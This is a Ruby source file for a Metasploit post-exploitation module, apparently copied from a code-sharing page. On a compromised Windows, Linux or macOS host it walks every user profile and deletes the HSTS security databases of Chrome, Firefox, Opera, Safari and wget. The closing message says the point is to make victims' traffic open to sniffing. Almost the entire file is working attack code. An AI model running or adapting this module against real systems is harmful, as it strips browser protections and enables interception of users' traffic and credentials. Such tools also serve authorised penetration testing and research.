Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::UserProfiles
9
  include Msf::Post::OSX::System
10
  include Msf::Post::Unix
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Web browsers HSTS entries eraser',
17
        'Description' => %q{
18
          This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox,
19
          Google Chrome, Opera, Safari and wget.
20
        },
21
        'License' => MSF_LICENSE,
22
        'Author' => [
23
          'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths
24
        ],
25
        'Platform' => %w[linux osx unix win],
26
        'Arch' => [ARCH_X86, ARCH_X64],
27
        'References' => [
28
          [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ],
29
          [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ]
30
        ],
31
        'SessionTypes' => %w[meterpreter shell]
32
      )
33
    )
34

35
    register_options([
36
      OptBool.new('DISCLAIMER',
37
                  [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false])
38
    ])
39
  end
40

41
  def run
42
    unless (datastore['DISCLAIMER'] == true)
43
      print_error('This module will delete HSTS data from all browsers on the target. You must set the DISCLAIMER option to True to acknowledge that you understand this warning.')
44
      return
45
    end
46

47
    profiles = user_profiles
48

49
    profiles.each do |user_profile|
50
      account = user_profile['UserName']
51
      browsers_hsts_db_path = {}
52

53
      case session.platform
54
      when 'windows'
55
        browsers_hsts_db_path = {
56
          'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity",
57
          'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", # Just path for now
58
          'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity"
59
        }
60
      when 'unix', 'linux'
61
        browsers_hsts_db_path = {
62
          'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity",
63
          'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", # Just path for now
64
          'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity",
65
          'wget' => "#{user_profile['LocalAppData']}/.wget-hsts"
66
        }
67
      when 'osx'
68
        browsers_hsts_db_path = {
69
          'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity",
70
          'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", # Just path for now
71
          'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity",
72
          'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist"
73
        }
74
      else
75
        print_error "Platform not recognized: #{session.platform}"
76
      end
77

78
      browsers_hsts_db_path.each_pair do |browser, path|
79
        if browser == 'Firefox'
80
          hsts_db_path = []
81
          if directory?(path)
82
            files = dir(path)
83
            files.reject! { |file| %w[. ..].include?(file) }
84
            files.each do |file_path|
85
              hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/)
86
            end
87
          end
88
          path = hsts_db_path[0]
89
        end
90
        if !path.nil? && file?(path)
91
          print_status "Removing #{browser} HSTS database for #{account}... "
92
          file_rm(path)
93
        end
94
      end
95
    end
96

97
    print_status 'HSTS databases removed! Now enjoy your favorite sniffer! ;-)'
98
  end
99

100
  def user_profiles
101
    user_profiles = []
102
    case session.platform
103
    when /unix|linux/
104
      user_names = dir('/home')
105
      user_names.reject! { |u| %w[. ..].include?(u) }
106
      user_names.each do |user_name|
107
        user_profiles.push('UserName' => user_name, 'LocalAppData' => "/home/#{user_name}")
108
      end
109
    when /osx/
110
      user_names = session.shell_command('ls /Users').split
111
      user_names.reject! { |u| u == 'Shared' }
112
      user_names.each do |user_name|
113
        user_profiles.push(
114
          'UserName' => user_name,
115
          'AppData' => "/Users/#{user_name}/Library",
116
          'LocalAppData' => "/Users/#{user_name}/Library/Application Support"
117
        )
118
      end
119
    when /windows/
120
      user_profiles |= grab_user_profiles
121
    else
122
      print_error 'Error getting user profile data!'
123
    end
124
    user_profiles
125
  end
126

127
  def system_separator
128
    return session.platform == 'windows' ? '\\' : '/'
129
  end
130
end
131

132